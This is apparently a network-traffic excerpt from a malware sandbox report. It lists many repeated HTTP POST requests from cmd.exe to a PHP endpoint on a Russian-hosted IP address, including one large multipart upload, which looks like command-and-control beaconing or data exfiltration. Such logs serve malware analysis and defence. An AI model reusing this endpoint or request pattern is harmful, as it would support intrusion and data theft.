        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:40 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: multipart/form-data; boundary=----a1MzkLtwK6Jlzw4K2n1IyD4aUIeUq7wZpM
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 105202
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:41 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Content-Length: 4
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:42 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:43 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:44 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:46 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:47 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:48 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:49 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1724
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:50 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:51 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:53 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:54 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:55 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:56 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:57 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:59 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:00 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:01 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:02 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:03 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:05 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:06 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:07 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:08 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:09 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:12 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:13 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:14 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:15 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:17 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:19 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:20 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:22 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:23 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1724
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:24 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:26 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:27 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:28 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:29 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:31 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
